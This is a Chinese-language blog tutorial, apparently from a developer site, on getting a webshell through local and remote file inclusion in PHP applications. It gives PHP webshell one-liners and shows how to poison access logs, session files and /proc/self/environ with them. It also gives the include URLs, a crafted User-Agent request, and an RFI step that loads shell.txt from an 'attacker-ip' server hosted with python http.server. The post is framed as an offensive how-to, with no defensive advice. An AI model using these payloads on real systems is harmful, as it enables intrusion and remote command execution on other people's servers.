利用文件包含GetShell

Z1eaf_complete2026-03-16 9:45

一、本地文件包含getshell

1-日志文件

原理 :当我们访问目标网站时,我们的访问请求会被记录在日志文件中(access.logerror.log),我们可以在访问路径拼接恶意代码,配合文件包含漏洞解析执行恶意代码
条件:需要知道日志文件的位置和名称

(1)注入恶意代码

通过一个特制的HTTP请求,将恶意代码(PHP Webshell)注入到服务器日志文件中。我们可以在URLUser-Agent字段中写入WebShell

php 复制代码 
<?php @system($_POST['cmd']);?>

我们就插入到URL中,这里我们需要用burpsuite抓包插入,因为直接在浏览器中插入,代码会被URL编码

(2)包含日志文件

利用本地文件包含漏洞,通过文件包含参数(如file)包含日志文件

复制代码 
http://php/include.php?file=E:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1773532800

当服务器执行这个请求的时候,它会把日志文件的内容当作php代码来执行,从而执行我们注入的命令whoami

复制代码 
http://php/include.php?file=E:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1773532800&cmd=whoami

2-session文件

原理 :某些Web应用程序会将用户的Session信息保存在某些服务器的tmp目录下,文件命名通常为sess_PHPSESSID。如果攻击者可以控制Session数据,就能通过LFI包含该文件getshell
条件

  1. 知道Session存储路径
  2. 能够控制Session数据,特别是变量名
  3. Session存储路径可访问(常见路径如/var/lib/php/sessions//tmp/等)。

(1)设置Session值

通过$_SESSION变量,将恶意代码注入到Session中。这通常需要先找到一个可以控制Session值的参数,例如在登录或注册时

复制代码 
$_SESSION['username']="<?php eval($_POST['cmd']);?>";

(2)获取文件路径

通常Session的命名为sess_加上Session ID。看通过浏览器Cookies中的PHPSESSID来获取 ,然后将文件包含

复制代码 
http://example.com/index.pph?file=../../../../emp/sess_aadadaw212eda2131da13123

(3)执行恶意代码

当LFI漏洞包含该Session文件时,恶意代码被执行

3-/proc/self/environ

在Linux系统中,/proc/self/environ文件存储了当前进程的环境变量。攻击者可以通过设置User-Agent等环境变量,将恶意代码注入到该文件中,利用LFI漏洞包含

(1)设置User-Agent

发送一个带有恶意User-Agent的请求

复制代码 
GET /index.php?page=test.php
HTTP/1.1
Host:example.com
User-Agent: <?php @system('whoami');?>

(2)包含环境变量文件

复制代码 
http://example.com/index.php?file=../../../../proc/self/environ

(3)执行命令

当LFI漏洞包含该文件时,恶意代码被执行

二、远程文件包含getshell

RFI通常LFI更容易利用,因为它允许攻击者直接从自己的服务器上包含并执行恶意文件

(1)制作Webshell文件

在攻击者自己的服务器上创建一个Webshell文件,例如:

php 复制代码 
<?php @system($_POST['cmd']);?>

为了绕过一些过滤,文件名可以不使用.php后最,例如:shell.txtshell.jpg

(2)启动HTTP服务

在攻击者的服务器上开启有一个简单的HTTP服务来托管shell.txt

复制代码 
python -m http.server 80

(3)远程文件包含

利用RFI漏洞,将URL指向攻击者服务器,包含shell.txt

复制代码 
http://example.com/index.php?file=http://attacker-ip/shell.txt

注意:为了防止服务器对URL过滤,有时候需要使用编码、伪协议等技巧绕过

(4)执行命令

如果成功,shell.txt中的Webshell代码已经被执行,可以使用工具或直接在URL中POST数据来执行命令

复制代码 
POST /index.php?file=http://attacker-ip/shell.txt HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

cmd=ls -al
相关推荐
lcreek15 分钟前
SQL 注入实战:DVWA High 完整测试指南
网络安全·sql注入
●VON2 小时前
AtomGit Flutter鸿蒙客户端:数据模型
android·服务器·安全·flutter·harmonyos·鸿蒙
不灭锦鲤3 小时前
网络安全第120天
安全·web安全
德迅--文琪3 小时前
游戏盾筑牢网络游戏防攻击安全防线
安全·游戏
NineData3 小时前
SQL 都在等锁时,ChatDBA 先帮 MySQL 找到谁在挡路
数据库·人工智能·sql·mysql·安全·数据复制·数据迁移工具
超级无敌zhq3 小时前
后渗透痕迹清理:攻防对抗中的隐身术
网络·数据库·网络安全
打码人的日常分享3 小时前
数据安全,网络安全风险评估报告(Word)
安全·web安全
m0_738120724 小时前
Docker 环境下 Vulfocus 靶场搭建全流程(附镜像源问题解决方案)
运维·服务器·网络·安全·docker·容器
芯盾时代4 小时前
企业建立安全防线治理失控的Agent
大数据·人工智能·安全
hz567894 小时前
公安局远程办案用什么音视频系统?安全取证与多方协同方案
安全·架构·云计算·音视频·实时音视频·信息与通信
热门推荐
01《置身钉内》原文-可播放阅读02GitHub 镜像站点03【AI】2026 年具身智能模型和世界模型总结04Codex 下载安装指南:Windows 和 macOS 官方版下载052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?062026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08AI科技热点日报 | 2026年6月1日09CC-Switch 下载、安装与使用配置指南【2026.5.29】10CC-Switch & Claude 基于 Linux 服务器安装使用指南